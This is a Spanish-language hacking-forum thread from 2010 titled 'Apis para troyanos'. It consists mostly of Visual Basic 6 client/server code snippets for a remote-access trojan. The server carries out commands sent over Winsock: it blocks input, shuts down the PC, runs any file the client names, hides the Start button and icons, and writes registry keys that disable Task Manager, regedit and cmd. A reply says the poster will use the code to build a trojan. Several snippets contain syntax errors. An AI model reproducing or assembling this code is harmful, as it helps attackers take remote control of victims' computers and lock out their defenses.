Sólo texto | Texto con Imágenes

Underc0de

[In]Seguridad Informática => Análisis y desarrollo de malwares => Desarrollo y modificación de malwares => Mensaje iniciado por: ANTRAX en Febrero 23, 2010, 10:06:46 AM

Título: Apis para troyanos
Publicado por: ANTRAX en Febrero 23, 2010, 10:06:46 AM
Código [Seleccionar]
Declare Function ShowCursor Lib "user32" _
(ByVal bShow As Long) As Long


EN el SERVER en la sección de Data arrival
Código:

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "desp" then ShowCursor false
end sub



Y en el command button del cliente


Código:

Private Sub Command1_Click()
ws.senddata "desp"
End Sub


Y ya cuano ustedes presionaran el button de desaparecer el mouse el enviaria los datos al server y este mismo los ejecutaria!!!


Bueno aqui les dejo otros codes para que los implementeis!!!



Código:

-----------------------blokear mouse i teclado----------------------
agregar un commandbutton en el cliente i un modulo en el server
-----en el modulo del server------

Public Declare Function BlockInput Lib "user32" _
(ByVal fBlock As Long) As Long

-----en el server------

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "desa" then BlockInput true
end sub

-----en el cliente---

Private Sub Command1_Click()
ws.senddata "desa"
End Sub





Código:

---------------------------------------hacer sonar beep ----------------

agregar un commandbutton en el cliente i un mopdulo en el server
-----en el modulo del server------

Public Declare Function Beep Lib "kernel32" (ByVal dwFreq As Long, ByVal dwDuration As Long) As Long

------en el server---------

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "beep" then
Beep 999, 999
Beep 999, 999
end if
end sub

----3n 3l kl13nt3 xd-----
Private Sub Command1_Click()
ws.senddata "beep"
End Sub




Código:

-----------------------------------------abrir cosita de los cd---------------------------

agregar un modulo en el server i un commandbutton en el cliente

-----en el modulo del server---
Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal _
lpstrReturnString As String, ByVal uReturnLength As Long, _
ByVal hwndCallback As Long) As Long

----en el server---

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trok" then
Dim Res As Long, ReturnString As String * 127
Res = mciSendString("Set CDAudio Door Open", ReturnString, 127, 0)
end if
end sub

---en el cliente----

Private Sub Command1_Click()
ws.senddata "trok"
End Sub



Código:

-------------------------blokear el taskmgr.exe(cttrl + alt +supr)-------------------------

agregar 1 comand button en el server i 1 en el cliente

----en el server-----

Private Sub Command1_Click()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "1"
End Sub

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
On Error GoTo men

Set Fso = CreateObject("wscript.shell"

Fso.RegWrite Folder, Value, "REG_DWORD"


Set Fso = Nothing


Exit Sub
'error
men:
MsgBox Err.Description: Resume Next
End Sub

rivate Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trtk" then call Command1_Click
end sub

----en el cliente----
Private Sub Command1_Click()
ws.senddata " trtk"
end sub



Código:

----------------------------------------apagar el pc------------------

agregar un commandbutton en el cliente
----en el server---
Private Sub ws_DataArrival(ByVal bytesTotal As Long)

Dim datos As String
Dim sn As String
sn = "shutdown"
ws.GetData datos
If datos = "lol" Then Shell (sn & " -s -t 00"
----en el cliente----
Private Sub Command1_Click()
ws.senddata "lol"
End Sub



Código:

---------------------ejecutar un archivo----------------

agregar un textbox en el cliente i un comandbutton en el cliente

----en el server----

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
If Left(datos, 4) = "ejec" Then
datos = Right(datos, Len(datos) - 4)
Shell (datos)
End If
end sub

---en el cliente---

Private Sub Form_Load()
text1.text = "aka va el archivo a ejecutar"
End Sub
Private Sub Command1_Click()
ws.senddata "ejec" & text1.text
End Sub




Código:

-----------------------------------no dejar abrir ventanas-----------------------------------

agrega un modulo i un timer en el server i un commandbutton en el kliente

----en el modulo del server---

Public Const VK_LWIN = &H5B
Public Const KEYEVENTF_KEYUP = &H2

Public Declare Sub keybd_event Lib "user32" _
(ByVal bVk As Byte, ByVal bScan As Byte, _
ByVal dwFlags As Long, ByVal dwExtraInfo As Long)

----en el server----

Private Sub Form_Load()
timer1.enabled = false
End Sub
Private Sub Timer1_Timer()
Call keybd_event(VK_LWIN, 0, 0, 0)
Call keybd_event(77, 0, 0, 0)
Call keybd_event(VK_LWIN, 0, KEYEVENTF_KEYUP, 0)
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "jajaja" then
timer1.interval = 100
timer1.enabled = true
end sub

--en el cliente----
Private Sub Command1_Click()
ws.senddata "jajaja"
End Sub

Código:

------------------------despareser iconos------------------

agregar un commandbutton en el cliente

-----en el server---

Private Declare Function FindWindowEx Lib "user32" _
Alias "FindWindowExA" (ByVal hWnd1 As Long, _
ByVal hWnd2 As Long, ByVal lpsz1 As String, _
ByVal lpsz2 As String) As Long


Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, _
ByVal nCmdShow As Long) As Long

Const SW_SHOW = 5
Const SW_HIDE = 0



private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "topo" then
Dim Ret As Long

On Error Resume Next

Ret = FindWindowEx(0&, 0&, "Progman", vbNullString)

ShowWindow Ret, SW_HIDE
end if
End Sub

------en el cliente -----

Private Sub Command1_Click()
ws.senddata "topo"
end sub




Código:

---------------------desaparecer boton de inicio (signo de windows)-----------------

agregar un command button en el cliente

--------------------en el server---------
Const WS_CHILD = &H40000000
Const WM_LBUTTONDOWN = &H201
Const WM_LBUTTONUP = &H202
Const SW_HIDE = 0
Const SW_NORMAL = 1


Private Type RECT
Left As Long
Top As Long
Right As Long
Bottom As Long
End Type


Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Private Declare Function GetWindowRect Lib "user32" (ByVal hwnd As Long, lpRect As RECT) As Long
Private Declare Function CreateWindowEx Lib "user32" Alias "CreateWindowExA" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByValhMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long
Private Declare Function DestroyWindow Lib "user32" (ByVal hwnd As Long) As Long

Dim tWnd As Long, bWnd As Long, ncWnd As Long

Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "paza" then
Dim R As RECT

tWnd = FindWindow("Shell_TrayWnd", vbNullString)
bWnd = FindWindowEx(tWnd, ByVal 0&, "BUTTON", vbNullString)

GetWindowRect bWnd, R

ShowWindow ncWnd, SW_NORMAL

ShowWindow bWnd, SW_HIDE
end if

----------en el cliente-------------

Private Sub Command1_Click()
ws.senddata "paza"
End Sub




Código:

-----------------------deabilitar el regedit------------------

agregar un command button en el cliente

-----------en el server------------------

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim xdf As Object
Set xdf = CreateObject("wscript.shell"
xdf.RegWrite Folder, Value, "REG_DWORD"
Set Fxdf = Nothing
Exit Sub
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "regeditc" then
CreateIntegerKey "HKEY_CURRENT_USER\software\microsoft\windows\curr entversion\policies\system\DisableRegistryTools", "1"
end if
end sub

----------en el cliente----------

Private Sub Command1_Click()
ws.senddata = "regeditc"
End Sub



Código:

---------desabilitar el cmd (trae problemas con algunos codes que ocupan el cmd)----

agregar un commandbutton en el cliente

-----en el server-----

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
Set Fso = CreateObject("wscript.shell"
Fso.RegWrite Folder, Value, "REG_DWORD"
Set Fso = Nothing
Exit Sub
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "cmdc" then
CreateIntegerKey "HKEY_CURRENT_USER\Software\Policies\Microsoft\Win dows\System\DisableCMD", "1"
end if
end sub

----en el cliente----

Private Sub Command1_Click()
ws.senddata = "cmdc"
End Sub
-------activar cmd--------------

agregar un commandbutton en el cliente

-----en el server-----

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
Set Fso = CreateObject("wscript.shell"
Fso.RegWrite Folder, Value, "REG_DWORD"
Set Fso = Nothing
Exit Sub
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "cmdb" then
CreateIntegerKey "HKEY_CURRENT_USER\Software\Policies\Microsoft\Win dows\System\DisableCMD", "0"
end if
end sub
----en el cliente----
Private Sub Command1_Click()
ws.senddata = "cmdb"
End Sub




Código:

----------activar regedit------

agregar un command button en el cliente

-----------en el server------------------

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim xdf As Object
Set xdf = CreateObject("wscript.shell"
xdf.RegWrite Folder, Value, "REG_DWORD"
Set Fxdf = Nothing
Exit Sub
End Sub
Private Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "regedito" then
CreateIntegerKey "HKEY_CURRENT_USER\software\microsoft\windows\curr entversion\policies\system\DisableRegistryTools", "0"
end if
end sub

----------en el cliente----------

Private Sub Command1_Click()
ws.senddata = "regedito"
End Sub
-----activar taskmgr.exe-----
agregar 1 comand button en el server i 1 en el cliente
----en el server-----
Private Sub Command1_Click()
CreateIntegerKey "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Policies\System\DisableTaskmgr", "0"
End Sub

Private Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim Fso As Object
On Error GoTo men

Set Fso = CreateObject("wscript.shell"

Fso.RegWrite Folder, Value, "REG_DWORD"


Set Fso = Nothing


Exit Sub
'error
men:
MsgBox Err.Description: Resume Next
End Sub

rivate Sub ws_DataArrival(ByVal bytesTotal As Long)
Dim datos As String
ws.GetData datos
if datos = "trtj" then call Command1_Click
end sub

----en el cliente----

Private Sub Command1_Click()
ws.senddata " trtj"
end sub
Título: Re:Apis para troyanos
Publicado por: 0A10 en Abril 27, 2010, 05:08:24 PM
Perfecto, voi a crear un troyano desde 0 con visual basic y me bienen perfectos :)
Sólo texto | Texto con Imágenes